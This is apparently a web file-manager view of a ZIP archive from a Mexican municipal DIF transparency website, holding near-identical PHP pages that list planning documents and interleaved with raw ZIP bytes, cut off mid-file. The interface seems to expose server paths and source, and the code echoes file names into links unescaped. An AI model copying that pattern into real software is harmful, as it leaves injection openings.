File manager - Edit - /home/cuautla1/dif.cuautlajalisco.gob.mx/Fraccion1/Fraccion9/Fraccion3.zip
Back
PK j��[=�G* * F3a.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso a)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso a) Los apartados del Plan Nacional de Desarrollo que sirve de marco general a la planeación de las áreas relativas a las funciones del sujeto obligado</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/a/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�$� F3f.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso f)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso f) Las evaluaciones y encuestas que hagan los sujetos obligados a programas financiados con recursos públicos</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/f/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[wj7� � F3b.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso b)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso b) Los apartados de los programas federales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/b/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�z;� � F3g-20251212174503.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso g)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso g) Los demás instrumentos de planeación no comprendidos en los incisos anteriores</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/g/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�;@�� � F3c.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso c)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso c) Los apartados del Plan Estatal de Desarrollo</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/c/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�1�� � F3d.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso d)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso d) Los programas estatales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/d/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[� � F3e.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso e)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso e) Los programas regionales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/e/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�;@�� � F3c-20251212174320.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso c)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso c) Los apartados del Plan Estatal de Desarrollo</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/c/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�;@�� � % F3c-20251212174320-20251212223418.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso c)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso c) Los apartados del Plan Estatal de Desarrollo</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/c/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[� � F3e-20251212174620.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso e)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso e) Los programas regionales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/e/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�$� F3f-20251212174620.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso f)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso f) Las evaluaciones y encuestas que hagan los sujetos obligados a programas financiados con recursos públicos</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/f/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[wj7� � F3b-20251212174618.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso b)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso b) Los apartados de los programas federales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/b/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[=�G* * Fraccion4/F3a.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso a)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso a) Los apartados del Plan Nacional de Desarrollo que sirve de marco general a la planeación de las áreas relativas a las funciones del sujeto obligado</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/a/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�$� Fraccion4/F3f.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso f)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso f) Las evaluaciones y encuestas que hagan los sujetos obligados a programas financiados con recursos públicos</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/f/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[wj7� � Fraccion4/F3b.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso b)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso b) Los apartados de los programas federales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/b/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�;@�� � Fraccion4/F3c.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso c)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso c) Los apartados del Plan Estatal de Desarrollo</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/c/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[�1�� � Fraccion4/F3d.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso d)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso d) Los programas estatales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/d/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo "<tr> <td>" . htmlspecialchars($nombre_legible) . "</td> <td><a href='$ruta$archivo' target='_blank'>Ver documento</a></td> </tr>"; } } } else { echo "<tr><td colspan='2'>No se encontró la carpeta correspondiente.</td></tr>"; } ?> </tbody> </table> </main> </body> </html> PK j��[� � Fraccion4/F3e.phpnu �[��� <!DOCTYPE html> <html lang="es"> <head> <meta charset="UTF-8" /> <title>Fracción III - Inciso e)</title> <link rel="stylesheet" href="../menu.css" /> <style> @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@400;600&display=swap'); body { font-family: 'Poppins', sans-serif; margin: 0; padding: 0; } main { padding: 90px 20px 40px; max-width: 1100px; margin: 0 auto; } h1, h2 { color: #2b3e5c; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { border: 1px solid #ccc; padding: 10px; text-align: left; } th { background-color: #f0f0f0; } tr:hover { background-color: #f9f9f9; } a { color: #0066cc; text-decoration: none; } a:hover { text-decoration: underline; } </style> </head> <body> <?php include("../menu.php"); ?> <main> <h1>Fracción III - Información sobre la planeación del desarrollo</h1> <h2>Inciso e) Los programas regionales</h2> <table> <thead> <tr> <th>Documento</th> <th>Enlace</th> </tr> </thead> <tbody> <?php $ruta = "../Transparencia/Fraccion3/e/"; if (is_dir($ruta)) { $archivos = scandir($ruta); foreach ($archivos as $archivo) { $ext = strtolower(pathinfo($archivo, PATHINFO_EXTENSION)); if ($archivo !== "." && $archivo !== ".." && in_array($ext, ['pdf', 'docx', 'doc'])) { $nombre = pathinfo($archivo, PATHINFO_FILENAME); $nombre_legible = ucwords(str_replace(['-', '_'], ' ', $nombre)); echo 